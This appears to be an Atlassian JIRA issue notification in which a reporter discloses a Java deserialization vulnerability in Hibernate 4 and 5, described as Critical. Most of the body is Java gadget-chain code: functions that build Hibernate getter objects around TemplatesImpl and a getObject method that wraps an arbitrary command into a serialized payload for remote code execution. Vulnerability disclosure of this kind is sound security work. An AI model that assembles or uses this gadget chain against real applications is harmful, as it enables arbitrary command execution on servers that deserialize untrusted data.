Message Title

redrain created an issue

Issue Type:	Bug
Affects Versions:	5.0.0.CR1, 4.2.0.Final, 4.2.0.Beta1, 4.1.3.Final
Assignee:	Unassigned
Components:	core
Created:	13/Apr/2016 01:53 AM
Environment:	version 5 and version 4
Labels:	hibernate serialization security
Priority:	Critical
Reporter:	redrain

hi,
I'm redrain(rootredrain@gmail.com)
I found a vulnerability about deserialization and nobody report it to official

JdbcRowSetImpl is the standard implementation of the JdbcRowSet interface.

Class com.sun.rowset.JdbcRowSetImpl is serializable
we can use class TemplatesImpl to save the command with bytecode,
upon function interception custom bytecode will be called
hibernate4 can only call getters,so there are two payload to use

 
                                                                // Hibernate4
    public static Object makeHibernate4Getter ( Class<?> tplClass, String method ) throws ClassNotFoundException, NoSuchMethodException,
            SecurityException, InstantiationException, IllegalAccessException, IllegalArgumentException, InvocationTargetException {
        Class<?> getterIf = Class.forName("org.hibernate.property.Getter");
        Class<?> basicGetter = Class.forName("org.hibernate.property.BasicPropertyAccessor$BasicGetter");
        Constructor<?> bgCon = basicGetter.getDeclaredConstructor(Class.class, Method.class, String.class);
        bgCon.setAccessible(true);

        if ( !method.startsWith("get") ) {
            throw new IllegalArgumentException("Hibernate4 can only call getters");
        }

        String propName = Character.toLowerCase(method.charAt(3)) + method.substring(4);

        Object g = bgCon.newInstance(tplClass, tplClass.getDeclaredMethod(method), propName);
        Object arr = Array.newInstance(getterIf, 1);
        Array.set(arr, 0, g);
        return arr;
    }
 
                                                            

 
                                                                //Hibernate5
    public static Object makeHibernate5Getter ( Class<?> tplClass, String method ) throws NoSuchMethodException, SecurityException,
            ClassNotFoundException, InstantiationException, IllegalAccessException, IllegalArgumentException, InvocationTargetException {
        Class<?> getterIf = Class.forName("org.hibernate.property.access.spi.Getter");
        Class<?> basicGetter = Class.forName("org.hibernate.property.access.spi.GetterMethodImpl");
        Constructor<?> bgCon = basicGetter.getConstructor(Class.class, String.class, Method.class);
        Object g = bgCon.newInstance(tplClass, "test", tplClass.getDeclaredMethod(method));
        Object arr = Array.newInstance(getterIf, 1);
        Array.set(arr, 0, g);
        return arr;
    }
 
                                                            

there is a simple code to create a class

 
                                                                    public Object getObject ( String command ) throws Exception {
        Object tpl = Gadgets.createTemplatesImpl(command);
        Object getters = makeGetter(tpl.getClass(), "getOutputProperties");
        return makeCaller(tpl, getters);
    }

at last , call the bytecode to exploit

I would be glad to report it

Add Comment

This message was sent by Atlassian JIRA